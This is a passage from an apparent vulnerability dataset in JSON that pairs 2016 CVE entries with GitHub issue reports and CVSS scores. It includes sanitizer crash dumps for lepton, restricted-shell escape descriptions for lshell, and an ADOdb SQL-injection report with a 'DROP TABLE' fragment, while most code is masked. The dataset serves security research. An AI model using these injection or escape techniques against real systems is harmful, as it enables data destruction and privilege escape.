        "baseScore": 6.8,
        "impactScore": 4.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-6234",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/26",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/26",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2016-07-17T00:55:27Z",
        "description": "Some memory corruptions in lepton. Hi, I at this url you can download some samples that will cause memory corruption problems in lepton: URLTAG you can reproduce with PATHTAG singlethread unjailed preload APITAG /tmp/out.lep NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG decode error in scan0 / mcu2TS_MAIN NUMBERTAG TS_MODEL_INIT_BEGIN NUMBERTAG TS_MODEL_INIT NUMBERTAG TS_READ_STARTED NUMBERTAG TS_READ_FINISHED NUMBERTAG TS_JPEG_DECODE_STARTED NUMBERTAG TS_JPEG_DECODE_FINISHED NUMBERTAG TS_DONE NUMBERTAG bytes needed to decompress this file ::::BILL:::: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG cb NUMBERTAG at pc NUMBERTAG eb NUMBERTAG bp NUMBERTAG ffd0cfd NUMBERTAG sp NUMBERTAG ffd0cfd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG cb NUMBERTAG thread T NUMBERTAG eb NUMBERTAG in std::__atomic_base<unsigned int>::load(std::memory_order) const PATHTAG NUMBERTAG eb NUMBERTAG in std::__atomic_base<unsigned int>::operator unsigned APITAG const PATHTAG NUMBERTAG eb NUMBERTAG in print_bill(int) PATHTAG NUMBERTAG b7f3 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG effabc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG cb NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'billing_map' defined in PATHTAG NUMBERTAG cafc0) of size NUMBERTAG SUMMARY: APITAG unknown crash PATHTAG in std::__atomic_base<unsigned int>::load(std::memory_order) const Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG cec NUMBERTAG pc NUMBERTAG bp NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG cfc1c0 T NUMBERTAG in setup_imginfo_jpg(bool) PATHTAG NUMBERTAG f in bool APITAG int, unsigned int>, APITAG int, unsigned int> > > , ibytestream ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG d8af in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG da5d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in setup_imginfo_jpg(bool NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c9f NUMBERTAG at pc NUMBERTAG f1 bp NUMBERTAG ffeecdd5e NUMBERTAG sp NUMBERTAG ffeecdd5e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c9f NUMBERTAG thread T NUMBERTAG f0 in setup_imginfo_jpg(bool) PATHTAG NUMBERTAG f in bool APITAG int, unsigned int>, APITAG int, unsigned int> > > , ibytestream ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG d8af in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG c9f NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'read_done' defined in PATHTAG NUMBERTAG c9f NUMBERTAG of size NUMBERTAG c9f NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'overall_start' defined in PATHTAG NUMBERTAG c9ee0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in setup_imginfo_jpg(bool) Shadow bytes around the buggy address NUMBERTAG a NUMBERTAG b NUMBERTAG c NUMBERTAG d0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG e0:[f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c7c NUMBERTAG at pc NUMBERTAG d bp NUMBERTAG fff NUMBERTAG sp NUMBERTAG fff NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c7c NUMBERTAG thread T NUMBERTAG c in build_huffcodes(unsigned char , unsigned char , APITAG , APITAG ) PATHTAG NUMBERTAG c in parse_jfif_jpg(unsigned char, unsigned int, unsigned char ) PATHTAG NUMBERTAG ffd0 in APITAG int, unsigned int>, APITAG int, unsigned int> > > const&, APITAG APITAG > ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG ccc8 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG c7c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'hcodes' defined in PATHTAG NUMBERTAG c7c NUMBERTAG of size NUMBERTAG c7c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'htrees' defined in PATHTAG NUMBERTAG c5c NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in build_huffcodes(unsigned char , unsigned char , APITAG , APITAG ) Shadow bytes around the buggy address NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f9[f9]f9 f NUMBERTAG f NUMBERTAG fa NUMBERTAG fb NUMBERTAG fc NUMBERTAG fd NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG cad0a at pc NUMBERTAG fe NUMBERTAG bp NUMBERTAG fff NUMBERTAG d NUMBERTAG b0 sp NUMBERTAG fff NUMBERTAG d NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG cad0a thread T NUMBERTAG fe NUMBERTAG in APITAG unsigned short const ) PATHTAG NUMBERTAG fe NUMBERTAG in APITAG const , APITAG , APITAG const , unsigned int) PATHTAG NUMBERTAG b3a8 in APITAG APITAG >, std::vector<unsigned char, APITAG char> > ) PATHTAG NUMBERTAG b4ee in bool APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > )>::__call<bool NUMBERTAG ul NUMBERTAG ul>(std::tuple APITAG &&, APITAG NUMBERTAG ul>) PATHTAG NUMBERTAG b4ee in bool APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG PATHTAG NUMBERTAG b4ee in APITAG (), APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > )> APITAG const&) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG ceb5 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG fe3fb5cd NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG cad0a is located NUMBERTAG bytes to the left of global variable 'chroma_debug_height' defined in PATHTAG NUMBERTAG cad NUMBERTAG of size NUMBERTAG cad0a is located NUMBERTAG bytes to the right of global variable 'raw_decoded_fp_Y' defined in PATHTAG NUMBERTAG cad NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in APITAG unsigned short const ) Shadow bytes around the buggy address NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG a NUMBERTAG f9]f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ Thank you Marco",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-6250",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/711",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/711",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-05-28T18:49:50Z",
        "description": "Integer overflow checking filename size for ISO NUMBERTAG Reported by: Christian Wressnegger, Alwin Maier, and Fabian Yamaguchi The ISO NUMBERTAG writer is subject to integer overflows when verifying the filename size. This can lead to a crash when writing ISO NUMBERTAG images with NUMBERTAG GB or NUMBERTAG GB filenames.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-6252",
        "Issue_Url_old": "https://github.com/shadow-maint/shadow/issues/27",
        "Issue_Url_new": "https://github.com/shadow-maint/shadow/issues/27",
        "Repo_new": "shadow-maint/shadow",
        "Issue_Created_At": "2016-07-24T14:55:21Z",
        "description": "Incorrect integer handling CVETAG . Reported to APITAG bug tracker with proposed fix. CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-6298",
        "Issue_Url_old": "https://github.com/latchset/jwcrypto/issues/65",
        "Issue_Url_new": "https://github.com/latchset/jwcrypto/issues/65",
        "Repo_new": "latchset/jwcrypto",
        "Issue_Created_At": "2016-08-31T02:34:07Z",
        "description": "CVETAG : Million Messages Attack vulnerability. The jwcrypto implementation of the RSA NUMBERTAG algorithm is vulnerable to the Million Message Attack described in FILETAG . A timing attack can be leveraged against the implementation to detect when a chosed ciphertext generates a valid header and padding because invalid headr/padding generates a code exception and cryptographic operations are terminated earlier resulting in measurably faster processing over the network. Many thanks to Dennis Detering APITAG for discovering and reporting this vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2016-6305",
        "Issue_Url_old": "https://github.com/openssl/openssl/issues/1563",
        "Issue_Url_new": "https://github.com/openssl/openssl/issues/1563",
        "Repo_new": "openssl/openssl",
        "Issue_Created_At": "2016-09-10T17:12:28Z",
        "description": "APITAG NUMBERTAG hangs (CPU pegged) when SSL_peek is used with TLS NUMBERTAG Code to reproduce: ERRORTAG Reproduces NUMBERTAG reliably for me. Switching APITAG to APITAG fixes it, and switching APITAG to APITAG or APITAG also fixes it. Therefore I believe, but have not confirmed, that URLTAG is the loop that's spinning. Demonstration of what this looke like: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-6521",
        "Issue_Url_old": "https://github.com/sheehan/grails-console/issues/55",
        "Issue_Url_new": "https://github.com/sheehan/grails-console/issues/55",
        "Repo_new": "sheehan/grails-console",
        "Issue_Created_At": "2016-08-03T21:00:17Z",
        "description": "CSRF vulnerability, again. I'm afraid that the issue hasn't been fixed properly. I realized it today after deploying your new release. You can try: login (or simply visit in a barebone new grails application) the main app website, but DON'T visit the console. Trigger the poc I sent you the last time, and you'll see that it'll still work. After accessing the console the protection will be effective and the poc will stop working. I suspect that the reason might be the APITAG check. If the console hasn't been visited yet, there will be no APITAG in the session, and thus both side of the equations will be null , letting the check pass.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-6521",
        "Issue_Url_old": "https://github.com/sheehan/grails-console/issues/54",
        "Issue_Url_new": "https://github.com/sheehan/grails-console/issues/54",
        "Repo_new": "sheehan/grails-console",
        "Issue_Created_At": "2016-07-01T08:57:42Z",
        "description": "CSRF prevention. Same issue as URLTAG which was unfortunately not recognized for the severe bug that it is. Yesterday I explained privately the issue to MENTIONTAG and supplied him a POC. Will add the same information here once a fix is released (or otherwise to expedite its release), but for now this issue should merely serve to keep track of it publicly",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-6582",
        "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/875",
        "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/875",
        "Repo_new": "doorkeeper-gem/doorkeeper",
        "Issue_Created_At": "2016-08-12T20:19:36Z",
        "description": "Token revocation uses wrong authorization method. The FILETAG states that when revoking a token, \"the client also includes its authentication credentials as described in FILETAG \". The spec's example request for revocation looks like this: CODETAG Note the HTTP Basic authentication, not Bearer. The spec goes on to say that the authorization server \"first validates the client credentials (in case of a confidential client) and then verifies whether the token was issued to the client making the revocation request. If this validation fails, the request is refused and the client is informed of the error by the authorization server as described below\". It appears as though Doorkeeper instead authorizes the request using HTTP Bearer with an access token.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-6902",
        "Issue_Url_old": "https://github.com/ghantoos/lshell/issues/147",
        "Issue_Url_new": "https://github.com/ghantoos/lshell/issues/147",
        "Repo_new": "ghantoos/lshell",
        "Issue_Created_At": "2016-08-17T18:39:58Z",
        "description": "Restriction overrun via simple trick. If you run something like APITAG or APITAG it will exec bash command. This can be avoided by adding && and || to forbidden list, but still.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.9,
        "impactScore": 6.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2016-6903",
        "Issue_Url_old": "https://github.com/ghantoos/lshell/issues/149",
        "Issue_Url_new": "https://github.com/ghantoos/lshell/issues/149",
        "Repo_new": "ghantoos/lshell",
        "Issue_Created_At": "2016-08-17T19:36:05Z",
        "description": "SECURITY ISSUE: Escape possible by using special keys. Just type APITAG , APITAG after any allowed command and then type desired restricted command: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.9,
        "impactScore": 6.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2016-6905",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/248",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/248",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-07-05T04:45:01Z",
        "description": "Out Of Bounds Read in gd_tga.c. Hi, I'd like to report a OOB read issue to you. This issue can be triggered when parsing a specially crafted tga image. You can compile APITAG with APITAG to reproduce this issue. ERRORTAG Credit to Ke Liu of Tencent's Xuanwu LAB . Thanks.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7051",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-dataformat-xml/issues/211",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-dataformat-xml/issues/211",
        "Repo_new": "fasterxml/jackson-dataformat-xml",
        "Issue_Created_At": "2016-09-22T05:04:42Z",
        "description": "Default changes for APITAG , consider disabling DTD handling. Although XML specification defines DTD handling as part of core xml processing, for most XML use cases for networking systems DTDs are either not used, or are minority use case. Conversely use of DTDs is often actually an anti pattern considering access restrictions and overhead. With this in mind, it would probably make sense to change defaults to disable DTD processing and just allow changing settings to enable it for cases where it is needed, as opposed to the other way around. Compared to other default changes it would probably make sense to actually add a specific feature; but if not possible, then just simple setter for APITAG . Regardless it'd be easier to do this than to expect user to pre configure APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7075",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/34517",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/34517",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2016-10-11T01:24:04Z",
        "description": "Client certificate auth is using the subject CN from the intermediate CA cert, not from the end entity cert. APITAG Is this a request for help? (If yes, you should use our troubleshooting guide and community support channels, see FILETAG I tried slack, someone else ran in to my issue as well and just used separate CAs What keywords did you search in Kubernetes issues before filing this one? (If you have found any duplicates, you should instead reply there.): intermediate certificate Is this a BUG REPORT or FEATURE REQUEST? (choose one): FEATURE REQUEST APITAG Kubernetes version (use kubectl version ): Client Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG a git tree\", APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"darwin/amd NUMBERTAG Server Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Environment : Cloud provider or hardware configuration : aws OS (e.g. from /etc/os release): APITAG ID=coreos VERSION NUMBERTAG ERSION_ID NUMBERTAG BUILD_ID NUMBERTAG APITAG NUMBERTAG APITAG ANSI_COLOR NUMBERTAG HOME_URL=\" FILETAG \" BUG_REPORT_URL=\" CVETAG \" Kernel (e.g. ERRORTAG ): Linux ip NUMBERTAG APITAG NUMBERTAG coreos NUMBERTAG SMP Tue Sep NUMBERTAG UTC NUMBERTAG Intel(R) Xeon(R) CPU E NUMBERTAG GHz APITAG APITAG Install tools : kube aws Manually generated ssl certs Others : I'm using client cert+ABAC auth and have audit logging enabled. What happened : Clients using SSL certs for auth show the subject CN of their intermediate cert not their entity cert. I set the client cert to a certificate chain: APITAG Cert> APITAG Cert> APITAG Cert> ca.pem on all machines is set to the Root Cert What you expected to happen : I expect the client to use the Subject CN of the entity cert. The key I'm using is for the entity and the connection is secure, My audit logs just show the CN for the intermediate CA. How to reproduce it (as minimally and precisely as possible): Create a root CA cert Use it to sign an intermediate CA cert. Use root cert as CA, use certificate chain bundle as client cert, use correct client key Anything else do we need to know : I've never had the sub ca key file on any machine (it's in a yubikey) I'm seeing this in audit logs when I use the chain NUMBERTAG APITAG AUDIT: id NUMBERTAG f NUMBERTAG c d NUMBERTAG b af NUMBERTAG cca NUMBERTAG e6eee\" APITAG method=\"GET\" APITAG Key1 Sub CA\" as=\" APITAG \" namespace=\" APITAG \" PATHTAG When I set the ca.pem to my sub ca key and don't use my bundled certs, I see NUMBERTAG APITAG AUDIT: id NUMBERTAG c NUMBERTAG f e NUMBERTAG b NUMBERTAG a NUMBERTAG ca4ef NUMBERTAG ec\" APITAG method=\"GET\" user=\"kube worker\" as=\" APITAG \" namespace=\" APITAG \" PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-7103",
        "Issue_Url_old": "https://github.com/jquery/api.jqueryui.com/issues/281",
        "Issue_Url_new": "https://github.com/jquery/api.jqueryui.com/issues/281",
        "Repo_new": "jquery/api.jqueryui.com",
        "Issue_Created_At": "2015-10-19T13:40:23Z",
        "description": "XSS Vulnerability on APITAG option of Dialog APITAG UI. I couldn't submit the bug to the website CVETAG VULNERABILITY DETAILS A potential bug enables us to inject the XSS content into APITAG option using component ui dialog. As original of APITAG UI( URLTAG we shall not accept any HTML string inside it. VERSION Any site using the latest version APITAG UI NUMBERTAG REPRODUCTION CASE Create a new HTML page. Inject this content into new page. ERRORTAG A alert popup was shown. Completed. IN CONCLUSION We expect that the html string isn't allowed in the APITAG option as well as the popup alert not shown. If it displays, any attacker can take advantage of injecting the malicious XSS content into website. Please see details at here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7163",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/826",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/826",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-09-08T10:01:15Z",
        "description": "CVETAG Integer overflow in opj_pi_create_decode. This issue is used to track CVETAG . Fixed by c NUMBERTAG bc NUMBERTAG URLTAG and ef NUMBERTAG f NUMBERTAG URLTAG . APITAG is available at FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-7164",
        "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/1021",
        "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/1021",
        "Repo_new": "arvidn/libtorrent",
        "Issue_Created_At": "2016-08-21T12:56:33Z",
        "description": "APITAG fault\" (possible APITAG when parsing compressed data with function \"inflate_gzip\". libtorrent version (or branch NUMBERTAG platform/architecture: Ubuntu NUMBERTAG LTS NUMBERTAG compiler and compiler version: gcc version NUMBERTAG APITAG NUMBERTAG APITAG The issue was found with \"afl fuzzer\" while executing a modified version of the \"test_gzip\" testsuite with the following input data(displayed in base NUMBERTAG format): CODETAG A segmentation fault signal was captured while running: APITAG The output from ASAN: ERRORTAG The issue seems to be located in the puff.cpp file inside the \"construct\" function. To reproduce NUMBERTAG compile APITAG (here attached NUMBERTAG copy the base NUMBERTAG encoded data to a file (ex. APITAG NUMBERTAG decode the file to a new file (\"base NUMBERTAG d gzip_data.b NUMBERTAG gzip_data NUMBERTAG run ./test_gzip gzip_data FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7166",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/660",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/660",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-02-21T16:19:23Z",
        "description": "Possible denial of service using a crafted gzip file. This isse has been reported by me on the APITAG bugtracker CVETAG . The mentioned example file has been attached to the bug report there which is reproduced below. > The APITAG tar NUMBERTAG program uses a heuristic to check if an archive file is compressed. If it is, it calls into an appropriate library to receive a decompressed stream. Then it applies the heuristic again to catch the case of an archive that has been compressed multiple times. There is no limit to the number of recursive decompressions. > > Using a crafted gzip file (the attached file is a quine that unpacks to itself), one can get tar NUMBERTAG to invoke an infinite chain of gzip compressors until all the memory on the machine running tar NUMBERTAG has been exhausted or another resource limit kicks in. > > I see this behaviour as a bug and security problem. It can be used to perform denial of service attacks against machines that run APITAG and use tar NUMBERTAG to list the contents of untrusted archives.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-7405",
        "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/226",
        "Issue_Url_new": "https://github.com/adodb/adodb/issues/226",
        "Repo_new": "adodb/adodb",
        "Issue_Created_At": "2016-04-17T00:52:12Z",
        "description": "SECURITY: ADODB qstr does not quote properly with PDO. In ADODB NUMBERTAG using the PDO driver results in qstr not behaving properly, leading to SQL injection. The same method called with the APITAG driver works as expected. Example code: CODETAG Example results: CODETAG Note the unescaped backslash and different style of single quote escaping in the ADODB PDO example. This is an exploitable vulnerability: Exploit code: ERRORTAG Exploit results: CODETAG APITAG NUMBERTAG for \"; DROP TABLE APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7420",
